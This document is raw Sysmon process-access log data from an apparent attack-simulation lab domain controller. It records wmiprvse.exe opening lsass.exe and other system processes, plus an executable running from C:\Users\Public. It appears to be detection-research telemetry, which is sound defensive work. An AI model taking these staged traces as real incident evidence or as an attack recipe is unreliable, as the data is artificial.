15:59:16.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023073Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.570{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023072Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.570{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023071Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.570{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023070Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.570{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023069Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.570{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023068Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.570{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023067Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.570{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023066Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.570{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023065Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.570{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023064Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.570{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023063Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.570{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023062Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.570{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023061Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.570{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023060Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.570{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023059Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.570{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023058Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.570{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023057Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.570{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023056Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.570{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-5352-6008-2B06-00000000A301}7316C:\Windows\System32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023055Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.570{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-5352-6008-2B06-00000000A301}7316C:\Windows\System32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023054Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.570{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-5352-6008-2B06-00000000A301}7316C:\Windows\System32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023335Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5355-6008-3706-00000000A301}5124C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023334Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 